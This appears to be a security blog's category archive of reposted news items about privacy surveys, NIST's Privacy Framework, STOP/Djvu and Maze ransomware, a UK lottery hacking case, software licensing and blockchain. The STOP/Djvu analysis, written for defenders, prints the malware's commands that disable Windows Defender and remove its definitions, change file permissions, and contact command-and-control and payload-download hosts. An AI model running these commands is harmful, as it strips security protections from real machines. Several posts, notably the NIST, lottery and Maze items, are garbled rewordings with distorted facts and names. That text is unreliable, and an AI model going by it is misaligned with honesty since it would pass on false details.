Category Archives: data protection

50% of people would exercise at least one right under the CCPA

As state houses and Congress rush to consider new consumer privacy legislation in 2020, ​Americans expect more control over their personal information online, and are concerned with how businesses use the data collected about them, a DataGrail research reveals. In a OnePoll online survey of 2,000 people aged 18 and above, ​4 out of 5 ​Americans agreed there should be a law to protect their personal data, and ​83 percent ​of people​ ​expect to have … More

The post 50% of people would exercise at least one right under the CCPA appeared first on Help Net Security.

52% of companies use cloud services that have experienced a breach

Seventy-nine percent of companies store sensitive data in the public cloud, according to a McAfee survey. Anonymized cloud event data showing percentage of files in the cloud with sensitive data While these companies approve an average of 41 cloud services each, up 33 percent from last year, thousands of other services are used ad-hoc without vetting. In addition, 52 percent of companies use cloud services that have had user data stolen in a breach. By … More

The post 52% of companies use cloud services that have experienced a breach appeared first on Help Net Security.

Patients believe stronger privacy protections are more important than easier health data access

Patients and consumers deserve better access to personalized, actionable health care information to empower them to make better, more informed decisions – but it should not drive up health care costs or compromise the privacy of their personal health data, according to a poll of patients and consumers from Morning Consult and America’s Health Insurance Plans (AHIP). Personal privacy outweighs increased transparency A strong majority (62%) of patients want their data and privacy protected more … More

The post Patients believe stronger privacy protections are more important than easier health data access appeared first on Help Net Security.

Top 10 policy trends to watch for globally in 2020

The 10 top trends that will drive the most significant technological upheavals this year have been identified by Access Partnership. “Shifts in tech policy will disrupt life for everyone. While some governments try to leverage the benefits of 5G, artificial intelligence, and IoT, others find reasons simply to confront Big Tech ranging from protectionism to climate urgency. “Techlash trends highlighted in our report lay bare the risks of regulatory overreach: stymied innovation and economic growth … More

The post Top 10 policy trends to watch for globally in 2020 appeared first on Help Net Security.

NIST Releases Privacy Risk Management Framework

Last week, NIST announced version 1.0 of its Privacy Framework, a tool designed to support organizations in managing their privacy risks.

In September 2019, NIST released a revised draft Privacy Policy when it called for public feedback. The organization had initially hoped to introduce version 1.0 by the end of 2019, but only on 16 January was it officially announced.

The NIST Privacy Framework has been designed to help organizations of all sizes manage privacy risks by focusing on three main aspects: privacy when developing a product or service, information on privacy practices and interinstitutional cooperation.

The architecture consists of three main components: the heart, the profiles and the implementation stages. The core provides a granular set of activities and results aimed at facilitating internal communication. Profiles represent the core functions, categories and sub-categories of an organisation. Finally, implementation levels help organizations optimize the resources needed for their target profile to be achieved.

NIST stated that the Privacy Framework is a collaborative mechanism not a statute or rule to mitigate threats and enforce compliance with existing legislation, like the GDPR and CCPA in California.

“What you’ll find in the framework are building blocks that can help you achieve your privacy goals, which may include laws your organization needs to follow,” said Naomi Lefkovitz

“If you want to consider how to increase customer trust through more privacy-protective products or services, the framework can help you do that. But we designed it to be agnostic to any law, so it can assist you no matter what your goals are.”

The system should also make it easier for companies to keep up with technological developments and new uses for results, according to Lefkovitz.

“A class of personal data that we consider to be of low value today may have a whole new use in a couple of years, or you might have two classes of data that are not sensitive on their own, but if you put them together they suddenly may become sensitive as a unit,” she explained. “That’s why you need a framework for privacy risk management, not just a checklist of tasks: You need an approach that allows you to continually reevaluate and adjust to new risks.”

NIST states that the NIST cyber security system is intended to be complementary and both will be revised over time.

NIST Privacy System: An Business Risk Management Security Compliance Guide is accessible in PDF format on the NIST website.

The post NIST Releases Privacy Risk Management Framework appeared first on .

STOP (Djvu) Ransomware: Ransom For Your Shady Habits!

Estimated reading time: 9 minutes

With almost 200 extensions, STOP (djvu) ransomware can be said to be 2019’s most active and widespread ransomware. Although this ransomware was active a year before, it started its campaign aggressively in early 2019. To evade detection, it has been continuously changing its extensions and payloads. For earlier infections, data recovery was easier if the key was not online CnC generated. Once payload was received, decryption was easier as it used non-symmetric encryption algorithms and for offline systems, it used the same set of keys. There has been a change in its encryption strategy from mid-2019, which made the decryption of infected files difficult. By observing continuous improvement in infection vectors and payloads, one can consider STOP actors to be one of the most active malware authors of 2019.

Here, we will discuss in detail about its behavior and updated file encryption technique. We will also go through its parallel activities of downloading other malware and their behavior. The statistics would elaborate its prominence in the last few months.

Infection Vectors:

According to our telemetry, this ransomware is seen spreading through cracked applications, keygens, activators, fake application setup and fake windows updates. While taking a look at the infection vectors and the ransom demanded, we can say that these actors believed in quantity instead of quality like Ryuk did. According to our observations, cracked files or fake activators for different software like Tally, Autocad, Adobe Photoshop, Internet Download Manager, Microsoft Office, Opera browser, VMware Workstation, Quick Heal Total Security, etc. were seen spreading this ransomware.

Payload Behaviour:

Fig. 1: ProcessMap

The main payload of STOP (djvu) has lots of anti-emulation and anti-debugging techniques implemented by its common wrapper, which is believed to be used for most of the payloads. Few of the ransomware are seen avoiding encryption for a particular set of countries, depending on the region of their origin and strength of victims to pay the ransom. For that, we have observed the use of keyboard layouts to identify the country of the victim system. Here, STOP authors did not rely on legacy techniques as there might be a chance of error. The payload checks for the location of the system by visiting “https[:]//api.2ip.ua/geo.json” where in response we get information about the location and timezone of the system.

In response to this request, details of location including longitude, latitude, timezone along with country and city are received.

Fig. 2: IP Response

The retrieved country code is compared with a few other country codes. If it matches with any of the listed country codes, the payload does not execute further. The image below shows the country code comparison before encryption.

Fig. 3: Country Code Comparison

Once it confirms that the victim is not from one of the enlisted countries, it creates a folder with UUID or GUID used as its name at directory “%AppData%\Local\”. After that, payload creates self-copy at this location and access controls of this file are changed using ‘icals’ by the following command:

“icacls \”%AppData%\\Local\\{UuId}\” /deny *S-1-1-0:(OI)(CI)(DE,DC)”

Where OI: Object Inherit, CI: Container Inherit, DE: Delete, DC: Delete Child

Again after this, payload runs itself from its original location by elevating access rights as admin using

<Directory Path>\ewrewexcf.exe –Admin IsNotAutoStart IsNotTask 

Further, it terminates the parent process. Parameters confirm that the process is neither initiated by autostart programs nor it is a scheduled task and is running as admin. This newly executed process creates a task scheduler entry using TaskSchedulerCOM at:

C:\Windows\System32\Tasks\Time Trigger Task

Fig. 4: Time Trigger Task

Then it retrieves the MAC address of the system using GetAdaptersInfo(). An MD5 hash of this MAC address is then calculated using Windows Crypto APIs and is then used to uniquely identify the system. A request is sent to malicious CnC using this MD5 hash, which gets RSA-2048 public key and system encryption identifier i.e. personal ID as a response.

Request format:

http://ring2[.]ug/As73yhsyU34578hxxx/SDf565g/get.php?pid={Mac Address_MD5}&first=true

This response is stored in %AppData%\Local\bowsakkdestx.txt. This key is further used in file encryption, which we will discuss later. Also, the ID received along with the public key is stored in C:\SystemID\PersonalID.txt for future reference.

While receiving personal ID and public key, the ransomware payload also downloads a couple of other malware from the CnC server. It consists of infamous info-stealer i.e. Vidar and a trojan payload which is similar to previously seen Vilsel.

Fig. 5: File Download Requests

In Fig.5, ‘5.exe’ was downloaded and it is one of the Vidar payloads, while ‘updatewin1.exe’ was Vilsel. The lateral activity of these components will be discussed later.

For persistence, along with time trigger task, it also creates one RUN registry entry:

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run “SysHelper” = “%AppData%\Local\{UuId}\34efcdsax.exe” –AutoStart

It drops ransom note to the directories it has enumerated. Before start of encryption process, a mutex {1D6FC66E – D1F3 – 422C – 8A53 – C0BBCF3D900D} is created. This mutex is common throughout STOP-Djvu campaign.

It particularly checks for the presence of file I:\5d2860c89d774.jpg and if present, it encrypts this file.

File Encryption:

File encryption involves 2 types:

  • Encryption with Online Key
  • Encryption with Offline Key

In the first scenario, payload tries to establish a connection with CnC by sending a request for server-generated public key and ID using the associated MD5 hash of the system’s MAC address. The response is saved in bowsakkdestx.txt. For encryption, this key is used in the future.

In the latter type of encryption, if STOP ransomware is not able to get a response from the CnC, it checks for the existence of bowsakkdestx.txt at ‘%AppData%/Local’ directory. If the file found, it checks for the ‘Public Key’ keyword in the file. If the file does not contain a public key, payload deletes the file and again checks for the CnC response. On the other hand, if the file is not present then it uses public key and ID which are already present in the file. Most of the strings in the payload are present in encrypted form i.e. XORed with byte key 0x80. The recent payloads of stop have an offline ID which is appended by its extension name and “t1”.

ex: Z4aT0c1B4eHWZwaTg43eRzyM1gl3ZaaNVHrecot1

Few file types and directories are skipped from the encryption process based on path and file extensions.

Extensions excluded:

.sys .ini .dll .blf .bat .lnk .regtrans-ms

Along with above extensions, the extension used by payload to indicate encryption is also avoided.

Files Excluded:

ntuser.dat  ntuser.dat.LOG1  ntuser.dat.LOG2  ntuser.pol  _readme.txt

Folders in Windows directory and browser folders in the Program Files directory are excluded from encryption.

Before encryption, it also checks for file encryption marker i.e. “{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}” which is at the end of the file followed by encryption ID.

While encrypting a file, it keeps the first 5 bytes of the file as it is. The rest of the file data is encrypted with the Salsa20 algorithm. For the file data encryption, UUID is created and is used as a key for the Salsa20 algorithm. In this way, each file uses a new UUID and the unique key is used for encryption of each file. Given below is an example of one Salsa20 key.

Fig. 6: Salsa20 Key

After encryption of file data, the UUID used as Salsa20 key is also encrypted with the RSA-2048 public key which was received from the CnC server. In the case of offline encryption, this key is retrieved from the payload itself. The encrypted UUID is appended after encrypted file data. The personal ID which was again received from the server with RSA-2048 public key is appended to encrypted UUID. If files are encrypted offline, then this personal ID is also retrieved from file and is common for all offline infected victims. At the end of the file, encryption marker ‘{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}’ is written.

Fig. 7: File Encryption Structure

 

Lateral Activity:

     1. Vidar (5.exe)

Vidar is a known info-stealer trojan, which collects sensitive information from your system and then delivers it to its CnC. The information it may steal includes:

  • Browser Login Data, History, Cookies
  • Browser Cache
  • System Information
  • Messaging/Email software data
  • Two-factor authentication software data

It checks for the presence of various browsers and software including two-factor authentication tools.

Fig. 8: Vidar File Access

It stores stolen data in a randomly named folder in the ProgramData directory. In this directory, few ‘.zip’ files are created which contain files like information.txt which has details of user and machine, running processes and software installed in the system. The retrieved passwords/credentials from browsers and other software are stored in passwords.txt. The rest of the information is stored in directories/files with respective software names.

Fig. 9: Vidar File Write

There is one file additional named ID which contains data in the form of SQL database having tables like logins, meta, stats, sync_entities_metadata and sync_model_metadata. These tables mainly have browser-related data of the user. All of these data are then sent to CnC of Vidar which is hxxp://crarepo[.]com/ in this case. Changes in the CnC servers are observed over the period.

Fig. 10: Vidar HttpSendRequestA

     2. Updatewin1.exe:

This component is mainly used to hide ransomware’s existence or evade detection based on the behavior of malware. It shows similarity with the Vilsel Trojan family.

First of all, it executes itself with elevated privileges. This process with elevated privileges executes PowerShell with the following command line, to change execution policy from default restricted to RemoteSigned, which results in the execution of local policies without any digital signature.

powershell -Command Set-ExecutionPolicy -Scope CurrentUser RemoteSigned

Fig. 11: Updatewin RegSetValue

The updatewin1.exe then drops script.ps1 having command ‘Set-MpPreference -DisableRealtimeMonitoring $true’ at %temp% location. A new PowerShell instance is initiated with parameters:

 -NoProfile -ExecutionPolicy Bypass -Command “& {Start-Process PowerShell -ArgumentList ‘-NoProfile -ExecutionPolicy Bypass -File %AppData%\Local\script.ps1″”‘ -Verb RunAs.

This runs PowerShell with admin privileges and bypasses all execution policies for the current instance of PowerShell. This executes script.ps1 resulting in disabling of Windows Realtime Protection. It also removes downloaded updates/signatures of windows defender using the command:

mpcmdrun.exe -removedefinitions -all

The task manager is also disabled by changing the registry and then updatewin1.exe deletes itself using a batch file.

     3. Updatewin.exe:

This component has no suspicious or malicious activity. It just displays windows update prompt so that any of the suspicious activities will be considered as windows update changes. There is no minimize or close option to this window, one has to kill the process to get rid of it.

Fig. 12: Fake Update Window

 

Ransom note:

Fig. 13: _readme.txt Ransom note

Over the campaign, the STOP ransom note has remained the same with few small changes. It asks for $980 of ransom and gives a 50% discount if payment is done within 3 days. The conversation with victims is carried over the mail. Ransom note contains the Personal Id of the user which is also stored in C:\SystemID\PersonalID.txt.

Statistics:

Fig. 14: Statistics

From the introduction of the new RSA 2048 variant, we have seen a noticeable increase in infections. As the chart above states, there was a gradual increase from August till November with hits crossing 120,000 mark. However, there’s been a decrease in hits in December, which seems to have continued in the month of January.

Conclusion:

From the start of the STOP-djvu campaign, stop authors have focused on changing payloads and extensions within short intervals, making their presence among ransomware strong and sound. Initially, authors believed in symmetric cryptography, hoping for ransom from most of the cases with newer payloads and unique keys for each variant. The free decryptors for offline infections forced them to shift to asymmetric cryptography, which made the decryption of new infections harder. Also, propagating through multiple crack software, activators, keygen software and fake software/OS upgrades, has been an effective way of spreading for this ransomware.

IOCs:

Hashes:

74A9A644307645D1D527D7D39A87861C

F64CF802D1E163260F8EBD224E7B2078

959B266CAD13BA35AEE35D8D4B723ED4

9EE3B1BCF67A63354C8AF530C8FA5313

5B4BD24D6240F467BFBC74803C9F15B0

B0A89E143BABDA2762561BC7576017D7

290E97907E5BE8EA72178414762CD846

E3083483121CD288264F8C5624FB2CD1

 URLs:

hxxp://ring2[.]ug/files/penelop/3.exe

hxxp://ring2[.]ug/files/penelop/4.exe

hxxp://ring2[.]ug/files/penelop/5.exe

hxxp://ring2[.]ug/files/penelop/updatewin.exe

hxxp://ring2[.]ug/files/penelop/updatewin1.exe

hxxp://ring2[.]ug/files/penelop/updatewin2.exe

hxxp://crarepo[.]com/

The post STOP (Djvu) Ransomware: Ransom For Your Shady Habits! appeared first on Seqrite Blog.

National Lottery Hacker Theft £ 5, Land Prison Penalty

The brute-force account cracking tool of Sentry MBA has been used to compromise user accounts.

For nine months, an individual who was interested in a hack into the British National Lottery database and hijacking customer accounts was jailed.

Camelot, the UK national crime agency (NCA), said last week that Anwar Batson from Notting Hill, London, had helped and tuition to compromise the lotery operator.

The 29-year old, Idris Kayode Akinwunmi and Daniel Thompson and others, focused on fast cash from the auction, and Batson suggested the use of Sentry MBA to break and control user accounts.

“Even the most basic forms of cybercrime can have a substantial impact on victims,” said NCA senior investigating officer Andrew Shorrock. “No one should think cybercrime is victimless or that they can get away with it.”

Sentry MBA is a widely available digital cracking tool online. The software suite can be used when there are no anti-automation protections, taking into account the need for technical knowledge to smash a service online, with lists of weak passwords and device combos, and vulnerability account combinations exposed by data dumps and paste websites.

According to the 2019 survey of Verizon, 71% of data breaches currently are financially motivated, with about 70% containing defective and corrupted passwords.

The 29-year-old “told others that they could quickly make cash,” named Rosegold, with Sentry MBA, conversed “over hacking, purchasing and selling username and password lists, settings files and personally identifiable information,” UK prosecutions said.

Throughout 2016, the NCA was made aware that a cyber attack against the National Lottery has taken place. The company emphasized that the main drawing structures were not compromised, but the fire was on a site of millions of records.

The National Lotery reported then that around 27,000 player records could be compromised because of “suspicious activity,” and information could have been revealed including addresses, contact details, birth dates and restricted card data.

Batson used the tool to collect credentials, including those of one player from a lottery who had £ 13 stolen from Akinwunmi’s account, of which £ 5 had been shipped to Baston.

The payment was low, but still counted as theft and a crime under the Computer Misuse Act of Great Britain in 1990. Nevertheless, the National Lottery operator had to pay £ 230,000 for the attacks and 250 customers closed their accounts for the advertisement of the event, according to The Register.

Upon pleading guilty for four offences in the Southwark Crown Court and one charge of theft, Batson was sentenced to serve nine months behind bars. Initially, Batson refused to participate.

In 2018, Thompson and Akinwunmi were imprisoned for 8 months and four months respectively, after being charged with brute-force breaking efforts to attack the National Lottery Web site.

Over four years, the US Department of Justice (DoJ) jailed a US resident last week for large identity theft. Babatunde Olusegun Taiwo engaged in a scheme, which included the submission of false tax returns and compensation requests through the U.S. Internal Revenue Service (IRS) of the personal identification details of people exposed through a preliminary data breach.

In fact, Taiwo and co-defendants sought compensation for more than $12 million. The IRS paid $800,000 prior to the involvement of law enforcement.

The post National Lottery Hacker Theft £ 5, Land Prison Penalty appeared first on .

Freeware vs. Shareware vs. Open Source – What is Each and How to Use Them Safely

During the last decade or so, software deployment for both SMBs and enterprise has become rather problematic – not so much on the upscaling part, but rather on the number of licenses an institution has to purchase and renew. The costs can be ginormous, which is the very reason why the company owner resorts to cost-effective alternatives such as freeware, shareware, and open-source. In this article, I’m going to run you through each category. After that, you can decide which is better for your business.  Let’s get to it – freeware vs. shareware vs. open source. Who will win the race?

What is Freeware?

Loosely defined as a type of proprietary software, that it’s being distributed at no cost whatsoever for the user, freeware is the answer to accomplishing very simple tasks without the need of investing in expensive, license-based software. Freeware software has no EULA, license, or rights of any kind, which means that it can be deployed on both home and enterprise machines.

Freeware is not a modern concoction. In fact, the term itself was coined in the golden 80s by Andrew Fluegelman, who sough of means of making PC-Talk (Skype’s long-forgotten ancestors) available outside regular distribution channels. The key differentiator between freeware, shareware, and open-source is that freeware does not make its source code available, despite being free of charge.

A couple of freeware examples: Discord (IM used by the gaming community), Yahoo Messenger (rest in peace, my friend), µTorrent, IrfanView, Groove Music, Winamp, DVD Shrink, CCleaner, and others.

Freeware pros:

  • Easy to use and deploy (for home users and enterprises\SMBs).
  • A great way to incentivize your potential customers (for soft makers and marketeers gunning for paid licenses).
  • Solve daily tasks without having to invest in expensive software.
  • Quickly grow your user base.

Freeware cons:

  • Limited functionality.
  • No way of reverse-engineering it since the source code is not made available.
  • Customers may sometimes perceive the product as inferior.

 

What is Shareware?

Probably most of the apps found online and offline fall under this category. Shareware is so widespread that it ‘felt’ the need to have its own consortium. Called the Association of Shareware Professional or ASP, for short, this international trading and trade organization comprises over 1,500 vendors, authors, and online retailers. The term was coined around the same time as freeware.

While Fluegelman was pushing his PC-Talk comm app. Jim “Button” Knopf, an IBM employee at that time, was releasing a database program called PC-File. In legal terms, the main difference between Knopf’s apps and Fluegelman’s freebie is that the database program was never meant to be offered free of charge.

Knopf himself called his creation “user-supported software” meaning that users would need to cover some of the fees associated with the continual development of the product. No doubt, an interesting marketing praxis, but a lucrative one, given shareware’s popularity and availability.

Shareware is an umbrella term, encompassing various types of apps, each following a unique business model.

Types of shareware

1. Adware

Also called “advertising-supported software”, this type of shareware has embedded ads running alongside the apps. The purpose of adware is to generate revenue for its creator. Ads may be present during the installation process or as part of the user interface. Most are ‘hardwired’ to analyze the users’ traffic in order to display customized ads. Adware is free-to-use, but the sheer number of ads can interfere with normal operation. A large number of apps currently available on Google Play are adware.

2. Crippleware

It may sound like a new form of malware, but it’s actually a legit type of software. Why is it called “Crippleware”? Because the author purposely “cripples” the app’s vital functions, making them available in the paid or premium version. For instance, if you have photo-editing apps, the download as jpeg function may be disabled or the photos may have watermarks that can be removed by upgrading to full.

3. Trialware

Trialware apps can be used for a limited period.  In most cases, users will be granted access to all of the app’s functions (including the ones available in the paid version). However, once the trial period expires, the app will be disabled or revert to a very basic (and very unusable version). From my experience, trialware that doesn’t cover vital system processes (i.e. antivirus or malware-scanner), will simply stop working. They will, of course, display a splash screen meant to inform the user that the software has expired and that he must upgrade to full.

4. Donationware

The software grants the user access to all of its features. However, it does come with one small request: the user is asked to shell out a small amount of cash to support the project or just show appreciation for the author’s work. The payout part is optional, having no bearing of the app’s functionality. Given its behavior, one could consider that donationware has more in common with freeware than with shareware.

5. Nagware

Pejorative in nature, the term “nagware” describes a software category that reminds users via on-screen messages that their licenses are about to expire and that they should upgrade to the full version. In most cases, the nags will continue well after the trial period is over. The functionality will be reduced, the user having access only to basic functions.

6. Freemium

A portmanteau term (“free” + “premium”) describing a type of software that ‘withholds’ advanced features, making them available in the premium version. The free version is fully functional. Nags are rare, but users might receive ads from time to time regarding the advantages of the premium versions.

Shareware pros:

  • Free to use.
  • Powerful feature. Great for getting a one-time task done.
  • Donationware is just as good as any license-based application.
  • Diversity and abundance.
  • Most of them are cross-platformers.

Shareware cons:

  • Some legal issues may arise if deployed on enterprise machines.
  • Poor compatibility with newer operating systems.
  • Ads and nags can become annoying.
  • Shareware doesn’t benefit from regular security and functionality updates as licensed software.

One last thing to mention – neither freeware nor shareware authors don’t make the software code available for studying or altering. Which brings us to the third software category: open-source.

What is Open-Source?

Open-source software or OSS is a type of software in which the author releases the source code. Furthermore, as far as the copyright is concerned, whoever holds the software’s license can distribute, study or alter the source code. Enterprises would often turn to open-source solutions since they’re much easier to customize compared to licensed software.

The best example of OSS I can think of is VLC player, one of the most popular video players available online. That’s on the consumer side.

As for enterprises and SMBs, there are a number of open-source software that successfully replaced their license-based counterparts: OpernCart (online shopping platform), SuiteCRM (useful for managing customer info), Helpy (self-service support), Mailman (management tool for email lists), WordPress (blogging), Daawarpper (data visualization), Gimp (powerful image editor), LibreOffice (perfect and free alternative to Microsoft Office), and the list goes on.

Open-source software pros:

  • Free and cheaper compared to (paid) license-based products.
  • Modable, reliable, and easy to use.
  • Safer from a cybersecurity standpoint compared to free and even some license-based products.
  • Very flexible. It can be used beyond its intended purpose (you’re going to need a talented backend hand for that).

Open-source software cons:

  • It can incur some long-term (and unforeseeable) costs. Any issues that arise have to be dealt with by yourself or your dev team. This usually happens when the software has been outstretched or altered more than necessary. Doing in-house patching and/or repair points to another con: no support for the product. So, if something goes wrong, you’re on your own.
  • Less-than-friendly UI. It will also take you a while to learn the product.

 

Freeware vs. Shareware

Now that we’ve got the basics in place, let’s take a closer look at the first contenders: freeware vs. shareware.

First of all, I think it’s important to see which category the two of them address. We can agree (to disagree) that both types of software can be used on home and work machines alike. As someone who didn’t have a lot of money to spend on software, I can wholeheartedly say that freeware is what dreams are made of – imagine what it would have meant to buy a Photoshop license just to tweak some family photos or to pull a plank on your roommate.

Game streaming – for those of you familiar with the concept, the costs alone can make your head spin, that is if you want to go pro. Still, even the basics can cost a pretty penny. Luckily you can accomplish basic tasks like screen or voice recording with some very nice (and free) online tools.

Things change a bit when it comes to deploying freeware on enterprise machines. Of course, some shareware can handle some of the routine tasks. For instance, ePrompter is a great and hassle-free alternative to Microsoft Outlook or some other desktop-based email management tool. Even TeamViewer, the (over)glorified remote computer control tool is free and can be used to accomplish very simple tasks.

Other honorable mentions: Discord (great alternative to Teams, Skype for business, and even WhatsApp), B1 Free Archiver (if you really don’t want to buy WinRAR), Recuva (powerful data recovery application), CCleaner (registry cleaner), Foxit Reader (open and print pdf files), and Microsoft Visual Studio Express (supports multiple IDEs, pitch-perfect for web designers).

Indeed, they are very powerful tools, but, in my opinion, simply not enough to meet the needs of a bustling enterprise. It all boils down to statistics: the bigger the database, the likelier it is to find a solution (or more) to suit your needs.

Why shareware? There are literally thousands of apps, available both online and offline, some of them just as good, if not better than license-based software. One thing about shareware – it’s a short-term solution.

Basically, it’s your ‘emergency-only’ kit: problem – shareware – problem solved. This type of software wasn’t designed for long-term use. As I pointed out in the section about shareware, most have some kind of built-in ‘safety’ to prevent users from doing just that; except for donationware, of course. There’s also the matter of overexposing your machine(s) to malicious content. I will cover this in the last section of the article.

The main reason why shareware is better than freeware for enterprise needs – evergreen(ess). Most freeware is outdated, meaning that they may not even run properly on Windows 10 machines. If you also add the fact that they are unpatched, you’ve got yourself a major cybersecurity vulnerability. Last, but not least, to my knowledge, few freeware support platforms other than Microsoft Windows. So, if you need to deploy freeware on a machine running Linux or macOS, you’re in for a world of pain.

Winner – shareware. Hassle-free, tons of content, suitable for any kind of needs, be them home- or enterprise-related.

Shareware vs. open-source

Clearly, shareware is the better alternative to freeware, but how does it fare against open-source software. Clearly, the latter category holds the high ground here. Why? Because, as the name suggests, the source code is made available, which means that a talented backend hand can easily customize it. But, will it prove to be a match for shareware’s availability and ‘widespreadness’?

It could and it does. Open-source software is definitely getting a lot of attention and for a very good reason – even though OSS is free, it’s extremely reliable and tends to take quite a beating when subjected to repeated reverse-engineering. And, on top of that, OSS software, compared to freeware and shareware, is much more secure.

Open-source software is amazing simply because it’s out there and can potentially be molded into anything you like. However, it’s not the Holy Grail of enterprise software, nor does it want to be. OSS is scalable, dependable, and, in all cases, it’s made by an experienced computer engineer who isn’t necessarily motivated by money. Don’t get me wrong – shareware-type software is also developed by experienced people, but on the sample-now-buy-full-later basis.

As an enterprise, you should also consider the support aspect. If something goes terribly wrong with the software, there’s no one out there to help.

Well, that’s entirely correct; there’s an entire community out there of experts willing to give you a helping hand, but that means hours upon hours of digging through forums, asking questions and praying for someone to come up with the right answer. This perspective is not exactly compatible with an enterprise’s credo.

So, do we have a winner here? It would say that it’s a tie: open-source is dependable, flexible, and scalable, but low on support and could incur unforeseen costs, especially when you try to use for purposes other than it was designed for. On the other hand, shareware holds an abundant database but falls back as far as a long-term commitment.

Freeware vs. shareware vs open source

Now that we have all the pieces of the puzzle, it’s easier to figure out which is the best enterprise-grade solution.

Let’s start with freeware.

Major advantages – it’s free, easy to install, and can solve any number of issues. On the other hand, disadvantages wise, the freeware pool is very limited and can only address a handful of issues. Freeware would best be used on home machines. Take that and its questionable compatibility, no support of any kind, and the fact that most of them are obsolete, it’s safe to assume that freeware and enterprises just don’t mix.

Shareware – an entire database, laid down at your feet. Plenty of possibilities, but is shareware the answer to your company’s needs? It’s just a matter of how you look upon the problem: if it’s a one-time thing, then you should definitely consider deploying software on a couple of machines.

There’s no need to concern yourself with the trial period, as long as you can solve the task or tasks in one go. Just bear in mind that some apps will revert to basic functions or stop working altogether after a certain number of uses. Of course, if the app suits your needs, you can always activate the full version by buying the license.

Open-source – dependable, can easily be taken apart by any IDE, and free to use. Do take in mind that OSS can come with hidden costs and it’s harder to get used to it compared to shareware or license-based software. If you encounter issues along the way, you can always ask the dev community for help. Just don’t expect the answer to be prompt as in the case of an app that offers round-the-clock support.

In the end, it’s all up to you to decide which one clicks with your company’s needs.

Cybersecurity issues and safety tips

Tackling non-licensed-based software should come with a warning label. Up next, I’ll be discussing the risk of using shareware, freeware, and open-source software. I will also include some cybersecurity tips along the way.

1. Adware also means malware

If you plan on using shareware, pay extra attention to apps that use ads-generated revenue. Some of them may contain links to malicious websites that could seriously harm your machine. Best to check the security certificate after clicking on an ad, though I advise you not to.

2. Fake apps

Some applications advertised as freeware could be fake. Don’t download the first app you find on Google. Take your time and do some research. You would do well to stay away from websites that use too many CTAs and “free download” buttons. It’s like playing Russian Roulette with your personal data.

3. Freeware used as a malware entry point

As you know, outdated and unpatched software can be used by malicious hackers to circumvent your antivirus\antimalware solution. Since freeware does not receive regular security patches, it can become an entry point for malware.

4. Strengthen your cyber-defenses

When all else fails, ensure that you have a good antivirus\antimalware solution. Thor Premium Enterprise, our product that incorporates two of our award-winning technologies (Thor Foresight Enterprise and Thor Vigilance Enterprise) will ensure that no malware lands on your machine, by continuously scanning your outbound and inbound traffic, severing any malicious C&C connection it detects.

Wrap-up

Companies, regardless of their size and needs, can also benefit from freeware, shareware, and open-source software. It’s all about figuring out your needs and selecting the solution that makes the most sense. As always, if you have any questions, feel free to send me a message.

The post Freeware vs. Shareware vs. Open Source – What is Each and How to Use Them Safely appeared first on Heimdal Security Blog.

How can blockchain enable better data security for enterprises?

Estimated reading time: 2 minutes

NASA recently announced a proposal to explore the possibility of using blockchain to improve the cybersecurity of its current air traffic management systems. It was a powerful statement from one of the world’s most well-known organizations and a strong endorsement of blockchain which has the potential to change how business is conducted, worldwide.

To understand its power, it is important to understand what blockchain actually is — it is a type of ledger containing records arranged in data blocks that use cryptographic validation to link together. Blockchain is a database with built-in validation where all transactions are recorded and confirmed anonymously.

Decentralization for greater security

A key differentiating point about blockchain is that it is distributed and exists on multiple systems at the same time. Importantly, the information entered cannot be altered. Each user needs a private, cryptographically created key to access only the blocks they own. In this way, the ledger cannot be manipulated as no one can edit a blockchain without having the corresponding keys.

It is this decentralization that could revolutionize cybersecurity. The principle of blockchain technology is that there is no centralized authority or storage location – in conventional information systems, attackers can target this kind of a lower system to inflict maximum damage. This means each transaction is verified against the entire network with each transaction required to be verified cryptographically. This ultimately means that an entire database is not at risk in the event of a major vulnerability, mainly because it is distributed on different nodes unlike a conventional setup.

Benefits of blockchain technology

While research into blockchain continues, more and more companies are exploring how blockchain could benefit their enterprise security. Two key ways are:

A Lower percentage of DDoS attacks

Distributed denial of service (DDoS) attacks occur when an attacker launches multiple, continuous attacks on a server, ultimately compelling it to get overwhelmed and collapse. However, the very decentralization which is at the heart of blockchain technology could enable a lower percentage of DDoS attacks on enterprises. The information would be distributed along a large number of nodes ensuring there is no single point of vulnerability.

Better data protection

Enterprises have to be much more careful about the way they handle customer data considering the new wave of data protection laws across the world. Blockchain technology could ensure better protection of data, thanks to its inbuilt protection mechanisms. Data is cryptographically secured with unique keys and distributed across multiple devices.  Each node has a copy of the entire blockchain which is synchronized with a new update with details also recorded. Hence, any attempt at trying to delete data or put false data can be immediately detected.

With many companies exploring the power of blockchain for cybersecurity and other functions, it is quite clear that the technology has a long future. Enterprises must continue to explore ways in which they can unlock the power of blockchain to enable greater cybersecurity.

The post How can blockchain enable better data security for enterprises? appeared first on Seqrite Blog.

Maze Ransomware Operators Publish User Information

As if it wasn’t hard enough to have their data compromised, businesses who fell victim to Maze ransomware are now facing another threat: their data could become public.

Maze’s operators have been collecting data from victim organisations for a while, ultimately using it as a weapon until payment is received to decrypt archives. Now, for all those victims who refuse to pay the ransom, they threaten to release the data.

In this respect, a website was created by the threat actor where they identified the names and websites of eight businesses who allegedly refused to pay the sum demanded to retrieve their records.

According to technology journalist Brian Krebs, even though the event did not make news, at least one of the businesses on that list was actually targeted by Maze ransomware.

The Maze operators publish data on that page, such as the initial date of contamination, certain compromised records (office, text and PDF files), the overall volume of data allegedly obtained from the company, and the IP addresses and computer names of the infected servers.

The step is not shocking, particularly since the people behind Maze have been engaging in exfiltrating victim details for a while now and are also threatening to publicly disclose that information if the victim does not pay the demanded ransom.

Throughout one instance in which the Maze ransomware was introduced, the perpetrators first leveraged Cobalt Strike since obtaining access to the network, collecting data about the target area before advancing laterally. Also used was a tactic commonly associated with Russian agent of danger Cozy Bear.

The hackers then began using PowerShell to exfiltrate data and connect to a remote FTP server. They only implemented Maze ransomware after this phase was done to encrypt the data of the victim.

Cobalt Strike was used again after the original breach in another event that Cisco Talos attributed to the same perpetrator, and PowerShell was used to dump large amounts of data using FTP. Without making the information available, the attackers then demanded payment.

The two events are primarily linked through the Command and Control (C&C) technology used— the data was deposited to the same server as in the previously mentioned accident— using 7-Zip to compact the collected data, interactive logins through Windows Remote Desktop Protocol, and remote execution of PowerShell.

